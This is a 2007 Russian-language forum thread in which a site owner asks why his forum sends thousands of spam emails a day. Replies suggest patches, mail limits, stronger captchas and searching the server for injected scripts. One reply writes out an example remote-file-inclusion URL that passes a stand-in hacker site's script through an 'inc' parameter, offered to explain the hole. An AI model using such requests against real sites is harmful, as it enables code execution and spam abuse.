dmisavenko Опубликовано 9 Мая 2007 Жалоба Поделиться Опубликовано 9 Мая 2007 Добрый день. (с Днем Победы!) У меня такой вопрос: на моем форуме какой-то спам-бот все время рассылает ~5000 писем в сутки, из-за чего мой хостинг-аккаунт блокируется. Что делать? Каким образом найти и убрать эту дыру? Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
_Pingvin_ Опубликовано 9 Мая 2007 Жалоба Поделиться Опубликовано 9 Мая 2007 Это не "взлом", а спам.Вам сюда:Борьба со спамом на форумеАнти-спам модификации Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
FatCat Опубликовано 9 Мая 2007 Жалоба Поделиться Опубликовано 9 Мая 2007 Вы уверены что бот?Может быть у Вас где-то открытый инклайд сидит? Поищите, нет ли где-то кода include $inputИмя переменной может быть другим...Или бот рассылает по кнопочкам мейла пользователей средствами форума?Тогда срочно выставить в админке жесткие лимиты отправки сообщений на мейл, и затем разбираться с защитой отботов. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
-=Ronaldo=- Опубликовано 10 Мая 2007 Жалоба Поделиться Опубликовано 10 Мая 2007 Взломать можно всё что угодно Труднее всего статическую HTML-страницу на моем форуме какой-то спам-бот все время рассылает ~5000 писем в сутки, из-за чего мой хостинг-аккаунт блокируется. Действительно, если сделать upload зловредного скрипта, путем взлома, то такое возможно. Попроси провайдера выслать логи времени отправки писем и сравни их с временем доступа пользователей (зарегистрированных). Если время отправки совпадает с доступом всех пользователей, то вероятно реализовано через include если выявлен один - разбор полетов с ним Выход один - реализовать самоконтроль компонентов (скриптов). Могу взяться за работу, но за вознаграждение Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
dmisavenko Опубликовано 10 Мая 2007 Автор Жалоба Поделиться Опубликовано 10 Мая 2007 Рассылка идет вот таким вот образом: ... 2007-05-09 07:21:01 1Hlcjc-0003Oy-1 wstat@best5.hostsila.com 79272376559@sms.mgsm.ru 508 2007-05-09 07:21:01 1Hlcj6-00039g-U wstat@best5.hostsila.com 79270849844@sms.mgsm.ru 508 2007-05-09 07:21:00 1HlcjW-0003La-8 wstat@best5.hostsila.com 79270849844@sms.mgsm.ru 508 2007-05-09 07:21:00 1HlcjJ-0003Ex-T wstat@best5.hostsila.com 79270849844@sms.mgsm.ru 508 2007-05-09 07:21:00 1HlcjF-0003C0-5 wstat@best5.hostsila.com 79270849844@sms.mgsm.ru 508 2007-05-09 07:21:00 1Hlcj7-00039u-6 wstat@best5.hostsila.com 79270849844@sms.mgsm.ru 508 ... Обратите внимание на адреса. Таких зарегистрированных пользователей у меня нет. ЗЫ А можно как то выявить тот загруженный "зловредный скрипт"? И еще, зайдите и посмотрите плиз как у меня регистрация устроена. wstat.com.ua Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
-=Ronaldo=- Опубликовано 10 Мая 2007 Жалоба Поделиться Опубликовано 10 Мая 2007 Код регистрации твой легко распознать Цифр абсолютно черного цвета не должно быть, смотри сообщение выше от _Pingvin_ Обратите внимание на адреса. Таких зарегистрированных пользователей у меня нет. Зарегистрированные пользователи никак с этим не связаны, ты можешь только их вычислить по времени доступа с логами аксесс апача. Вобщем ставь патчи на версию своего форума и меняй код регистрации. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
FatCat Опубликовано 11 Мая 2007 Жалоба Поделиться Опубликовано 11 Мая 2007 ЗЫ А можно как то выявить тот загруженный "зловредный скрипт"?Можно.Два варианта взлома:1. Скрипт рассылки лежит у тебя на хосте. Скачай все файлы с хоста, и текстовым поиском поищи функции, использующиеся для отправки на мейл. Может быть найдешь файлы, которые ты на хост не заливал... 2. Скрипт рассылки инклайдится к твоей странице. Поищи что-то типа <? include $inc; ?>Хакер может делать запрос типа хттп://твой_сайт/файл.php?inc=хттп://хакерский_сайт/хакерский_файл.phpи таким образом рассылать своим скриптом с тввоего домена. Цитата Ссылка на комментарий Поделиться на других сайтах Прочее
Рекомендуемые сообщения
Присоединиться к обсуждению
Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.